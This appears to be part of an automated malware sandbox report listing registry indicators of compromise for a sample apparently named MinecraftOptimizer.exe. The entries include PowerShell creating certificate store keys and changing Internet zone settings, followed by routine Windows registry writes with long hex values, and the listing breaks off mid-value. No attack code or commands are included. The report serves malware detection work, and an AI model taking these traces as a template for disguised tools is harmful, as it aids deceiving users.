Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exeExplorer.EXEsvchost.exesvchost.exeMinecraftOptimizer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b16d81f9-53fa-4826- = "\\\\?\\Volume{FF3AB8F7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\28d5a9b61b78aa77d50a6ddd890b80c2cac62d61dde8636b4732c3266a8d3f7e"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f7c9fdb7-40e6-491b-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b16d81f9-53fa-4826- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000681f0231b2f8da0185f47631b2f8da0185f47631b2f8da014e500a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001b597c962000323864356139623631623738616137376435306136646464383930623830633263616336326436316464653836333662343733326333323636613864336637650000b20009000400efbe1b597c961b597c962e0000000000000000000000000000000000000000000000000085ca1700320038006400350061003900620036003100620037003800610061003700370064003500300061003600640064006400380039003000620038003000630032006300610063003600320064003600310064006400650038003600330036006200340037003300320063003300320036003600610038006400330066003700650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000da2b6ed91000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32386435613962363162373861613737643530613664646438393062383063326361633632643631646465383633366234373332633332363661386433663765000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000073796d726b63637500000000000000008408e6667430f343a65b22750d85fde62e6c3e04d450ef11a2a4f2ce673d64898408e6667430f343a65b22750d85fde62e6c3e04d450ef11a2a4f2ce673d6489ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003100370030003600330037003700390037002d003500360038003300390033003300320030002d0033003200330032003900330033003000330035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f7b83aff000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\044fc247-6503-4e48- = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\044fc247-6503-4e48-	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{BFCA5AA9-0589-4603-818F-8B769FEE764E}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9fed8e17-6cf6-469c-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28060ad3-a9d4-4eb1- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f8747530b2f8da01f8747530b2f8da01f8747530b2f8da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001b597d962000343163653431656439373864353962356230306364373562343561396131333232363864346435316434636234326634633234396432653531313663303037310000b20009000400efbe1b597d961b597d962e0000000000000000000000000000000000000000000000000008e61601340031006300650034003100650064003900370038006400350039006200350062003000300063006400370035006200340035006100390061003100330032003200360038006400340064003500310064003400630062003400320066003400630032003400390064003200650035003100310036006300300030003700310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000da2b6ed91000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34316365343165643937386435396235623030636437356234356139613133323236386434643531643463623432663463323439643265353131366330303731000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000073796d726b63637500000000000000008408e6667430f343a65b22750d85fde6276c3e04d450ef11a2a4f2ce673d64898408e6667430f343a65b22750d85fde6276c3e04d450ef11a2a4f2ce673d6489ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003100370030003600330037003700390037002d003500360038003300390033003300320030002d0033003200330032003900330033003000330035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f7b83aff000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\044fc247-6503-4e48-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f790d38-c427-43c2- = 75ec7731b2f8da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0c1440a-41d5-497f- = "\\\\?\\Volume{FF3AB8F7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fa94fb8a636a1d3f30c1055827db7ed9b1216fa5c391af38bdc52279182acfc9"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f- = "\\\\?\\Volume{FF3AB8F7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c1891ed0d4256bc3ea920278c7c4e7eaf195bfb0c0a9239052dd1c6020dc23bd"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\56630366-c91c-4475- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a598d930b2f8da01809c4132b2f8da01809c4132b2f8da0105900a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001b597d962000313632343965633732323139643336383437633839646132386233393265666638646132646634306463383139393862376133616233313637333332346334360000b20009000400efbe1b597d961b597d962e00000000000000000000000000000000000000000000000000b397e900310036003200340039006500630037003200320031003900640033003600380034003700630038003900640061003200380062003300390032006500660066003800640061003200640066003400300064006300380031003900390038006200370061003300610062003300310036003700330033003200340063003400360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000da2b6ed91000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31363234396563373232313964333638343763383964613238623339326566663864613264663430646338313939386237613361623331363733333234633436000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000073796d726b63637500000000000000008408e6667430f343a65b22750d85fde6316c3e04d450ef11a2a4f2ce673d64898408e6667430f343a65b22750d85fde6316c3e04d450ef11a2a4f2ce673d6489ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003100370030003600330037003700390037002d003500360038003300390033003300320030002d0033003200330032003900330033003000330035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f7b83aff000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d1dcaeee-c68f-44bb-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28060ad3-a9d4-4eb1- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03108a3e-b4c1-4d9c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b16d81f9-53fa-4826- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f7c9fdb7-40e6-491b- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68c34ceb-3233-4978- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007b634330b2f8da017b634330b2f8da017b634330b2f8da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001b597c962000323864356139623631623738616137376435306136646464383930623830633263616336326436316464653836333662343733326333323636613864336637650000b20009000400efbe1b597c961b597c962e0000000000000000000000000000000000000000000000000085ca1700320038006400350061003900620036003100620037003800610061003700370064003500300061003600640064006400380039003000620038003000630032006300610063003600320064003600310064006400650038003600330036006200340037003300320063003300320036003600610038006400330066003700650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000da2b6ed91000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32386435613962363162373861613737643530613664646438393062383063326361633632643631646465383633366234373332633332363661386433663765000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000073796d726b63637500000000000000008408e6667430f343a65b22750d85fde6256c3e04d450ef11a2a4f2ce673d64898408e6667430f343a65b22750d85fde6256c3e04d450ef11a2a4f2ce673d6489ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003100370030003600330037003700390037002d003500360038003300390033003300320030002d0033003200330032003900330033003000330035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f7b83aff000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03108a3e-b4c1-4d9c- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f790d38-c427-43c2- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001322e330b2f8da01b8bb3d31b2f8da01b8bb3d31b2f8da01113609000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001b597d962000643135386263336662336130366531653136383535396232346435633137643331363536343334386465343039643336656435383739386531386136616161370000b20009000400efbe1b597d961b597d962e00000000000000000000000000000000000000000000000000b4e6f700640031003500380062006300330066006200330061003000360065003100650031003600380035003500390062003200340064003500630031003700640033003100360035003600340033003400380064006500340030003900640033003600650064003500380037003900380065003100380061003600610061006100370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000da2b6ed91000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c6431353862633366623361303665316531363835353962323464356331376433313635363433343864653430396433366564353837393865